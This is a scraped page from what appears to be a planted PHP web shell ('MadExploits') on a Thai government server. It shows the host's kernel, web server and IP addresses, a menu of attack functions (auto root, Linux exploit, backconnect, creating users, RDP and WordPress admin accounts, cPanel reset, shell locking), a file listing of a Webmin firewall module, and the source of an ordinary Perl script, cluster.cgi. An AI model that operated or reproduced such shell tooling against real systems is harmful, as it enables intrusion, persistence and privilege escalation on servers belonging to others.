Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
libexec /
webmin /
ipfw /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
CHANGELOG
1.04
KB
-rw-r--r--
apply.cgi
293
B
-rwxr-xr-x
bootup.cgi
240
B
-rwxr-xr-x
cluster.cgi
1.98
KB
-rwxr-xr-x
cluster_add.cgi
1.79
KB
-rwxr-xr-x
cluster_delete.cgi
470
B
-rwxr-xr-x
config
89
B
-rw-r--r--
config.info
472
B
-rw-r--r--
config.info.ca
426
B
-rw-r--r--
config.info.ca.UTF-8
433
B
-rw-r--r--
config.info.de
547
B
-rw-r--r--
config.info.de.UTF-8
547
B
-rw-r--r--
config.info.nl
426
B
-rw-r--r--
config.info.nl.UTF-8
426
B
-rw-r--r--
convert.cgi
274
B
-rwxr-xr-x
edit_rule.cgi
10.16
KB
-rwxr-xr-x
index.cgi
6.36
KB
-rwxr-xr-x
install_check.pl
484
B
-rwxr-xr-x
ipfw-lib.pl
17.38
KB
-rwxr-xr-x
log_parser.pl
569
B
-rwxr-xr-x
module.info
170
B
-rw-r--r--
module.info.ca
106
B
-rw-r--r--
module.info.ca.UTF-8
118
B
-rw-r--r--
module.info.de
117
B
-rw-r--r--
module.info.de.UTF-8
129
B
-rw-r--r--
module.info.nl
21
B
-rw-r--r--
module.info.nl.UTF-8
27
B
-rw-r--r--
move.cgi
561
B
-rwxr-xr-x
save_rule.cgi
8.19
KB
-rwxr-xr-x
setup.cgi
4.14
KB
-rwxr-xr-x
start.pl
271
B
-rwxr-xr-x
stop.pl
254
B
-rwxr-xr-x
unapply.cgi
257
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cluster.cgi
#!/usr/bin/perl # Show hosts in firewall cluster require './ipfw-lib.pl'; &foreign_require("servers", "servers-lib.pl"); &ReadParse(); &ui_print_header(undef, $text{'cluster_title'}, undef, "cluster"); # Show existing servers @servers = &list_cluster_servers(); if (@servers) { print "<form action=cluster_delete.cgi>\n"; print "<table border width=100%>\n"; print "<tr $tb> <td width=10><br></td> ", "<td><b>$text{'cluster_host'}</b></td> ", "<td><b>$text{'cluster_desc'}</b></td> ", "<td><b>$text{'cluster_os'}</b></td> </tr>\n"; foreach $s (@servers) { print "<tr $cb>\n"; print "<td width=10><input type=checkbox name=d value=$s->{'id'}></td>\n"; print "<td>",$s->{'host'},"</td>\n"; print "<td>",$s->{'desc'} || "<br>","</td>\n"; foreach $t (@servers::server_types) { if ($t->[0] eq $s->{'type'}) { print "<td>$t->[1]</td>\n"; } } print "</tr>\n"; } print "</table>\n"; print "<input type=submit value='$text{'cluster_delete'}'></form>\n"; } else { print "<b>$text{'cluster_none'}</b><p>\n"; } # Show buttons to add print "<form action=cluster_add.cgi>\n"; print "<table width=100%><tr>\n"; @allservers = grep { $_->{'user'} } &servers::list_servers(); %gothost = map { $_->{'id'}, 1 } @servers; @addservers = grep { !$gothost{$_->{'id'}} } @allservers; if (@addservers) { print "<td><input type=submit name=add value='$text{'cluster_add'}'>\n"; print "<select name=server>\n"; foreach $s (@addservers) { print "<option value=$s->{'id'}>", $s->{'desc'} ? $s->{'desc'} : $s->{'host'},"\n"; } print "</select></td>\n"; } @groups = &servers::list_all_groups(\@allservers); if (@groups) { print "<td align=right><input type=submit name=gadd ", "value='$text{'cluster_gadd'}'>\n"; print "<select name=group>\n"; foreach $g (@groups) { print "<option>$g->{'name'}\n"; } print "</select></td>\n"; } print "</tr></table></form>\n"; if (!@allservers) { print "<b>$text{'cluster_need'}</b><p>\n"; } &ui_print_footer("", $text{'index_return'});
Close